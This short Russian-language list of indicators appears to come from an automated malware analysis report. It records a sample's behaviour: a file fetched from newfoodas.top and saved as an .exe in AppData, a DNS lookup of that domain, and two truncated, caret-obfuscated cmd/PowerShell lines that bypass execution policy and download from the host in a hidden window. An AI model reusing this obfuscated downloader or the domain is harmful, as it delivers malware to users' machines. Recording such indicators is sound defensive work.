Техническая информация
- http://newfoodas.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Pow^E^rS^HelL.E^xe^ -^Exe^C^u^tIonpOlic^Y ByP^a^SS -NOpR^O^f^IlE -wiN^do^wS^tylE^ h^idd^eN ^(^n^Ew-^O^BjECT^ SySTeM.^NeT.WeBc^LIeN^t).^D^o^W^n^L^O^aD^FI^L^e('http://newfoodas.t...
- DNS ASK ne###odas.top
- '<SYSTEM32>\cmd.exe' /C "Pow^E^rS^HelL.E^xe^ -^Exe^C^u^tIonpOlic^Y ByP^a^SS -NOpR^O^f^IlE -wiN^do^wS^tylE^ h^idd^eN ^(^n^Ew-^O^BjECT^ SySTeM.^NeT.WeBc^LIeN^t).^D^o^W^n^L^O^aD^FI^L^e('http://newfoodas.t...' (со скрытым окном)